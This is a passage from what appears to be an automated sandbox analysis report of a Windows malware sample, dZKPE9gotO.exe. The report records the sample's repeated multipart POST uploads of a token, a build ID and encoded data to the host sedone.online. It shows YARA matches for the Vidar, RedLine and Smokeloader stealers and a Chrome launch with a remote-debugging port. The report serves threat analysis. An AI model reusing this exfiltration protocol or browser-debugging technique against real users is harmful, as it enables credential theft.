                                                                                                                                                                                                                                                2024-12-16 14:40:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:41 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                53192.168.2.750014116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:42 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----3EUA1N7YM7GV37Q1VKX4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1817
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:42 UTC1817OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------3EUA1N7YM7GV37Q1VKX4Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                54192.168.2.750017116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:43 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----J5P8Q9RIE3WBAI5XBSR1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:43 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 50 38 51 39 52 49 45 33 57 42 41 49 35 58 42 53 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------J5P8Q9RIE3WBAI5XBSR1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------J5P8Q9RIE3WBAI5XBSR1Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                55192.168.2.750023116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----H4O8GV3OZMOZMYMG4WTR
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 98221
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------H4O8GV3OZMOZMYMG4WTRCont
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC16355OUTData Raw: 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 2b 52 36 46 52 58 50 2b 43 34 5a 37 66 77 36 73 4d 38 54 52 62 4c 69 66 79 30 61 46 6f 51 45 38 78 69 75 45 59 6b 71 75 4d 59 47 54 67 59 72 6f 4b 47 49 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 66 52 53 55 55 41 46 46 46 46 41 42 53 64 71 57 6b 6f 41 57 6b 6f 6f 6f 41 4b 4b 53 69 67 42 61 53 69 69 67 41 6f 6f 6f 6f 41 4b 4b 53 69 67 42 61 4b
                                                                                                                                                                                                                                                Data Ascii: Irhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv+R6FRXP+C4Z7fw6sM8TRbLify0aFoQE8xiuEYkquMYGTgYroKGIKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAfRSUUAFFFFABSdqWkoAWkoooAKKSigBaSiigAooooAKKSigBaK
                                                                                                                                                                                                                                                2024-12-16 14:40:47 UTC91OUTData Raw: 59 77 64 6f 58 48 47 4d 64 4b 35 2b 69 69 6d 41 56 63 6b 2f 77 43 51 4c 61 2f 39 66 45 33 2f 41 4b 44 48 56 4f 72 6b 6e 2f 49 46 74 66 38 41 72 34 6d 2f 39 42 6a 6f 41 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 48 34 4f 38 47 56 33 4f 5a 4d 4f 5a 4d 59 4d 47 34 57 54 52 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: YwdoXHGMdK5+iimAVck/wCQLa/9fE3/AKDHVOrkn/IFtf8Ar4m/9BjoA//Z------H4O8GV3OZMOZMYMG4WTR--
                                                                                                                                                                                                                                                2024-12-16 14:40:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:48 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                56192.168.2.750034116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:50 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FKXBA1N7QIEUAAA1NGVK
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------FKXBA1N7QIEUAAA1NGVKCont
                                                                                                                                                                                                                                                2024-12-16 14:40:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                57192.168.2.750040116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:52 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MOP8GVS26F3E37GL6PHV
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 56 53 32 36 46 33 45 33 37 47 4c 36 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 56 53 32 36 46 33 45 33 37 47 4c 36 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 56 53 32 36 46 33 45 33 37 47 4c 36 50 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------MOP8GVS26F3E37GL6PHVContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------MOP8GVS26F3E37GL6PHVContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MOP8GVS26F3E37GL6PHVCont
                                                                                                                                                                                                                                                2024-12-16 14:40:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:09:39:24
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\dZKPE9gotO.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:321'024 bytes
                                                                                                                                                                                                                                                MD5 hash:876A365BDA09B9EF39605E375D677F0A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                Start time:09:39:44
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                Start time:11:07:13
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                Start time:11:07:25
                                                                                                                                                                                                                                                Start date:16/12/2024
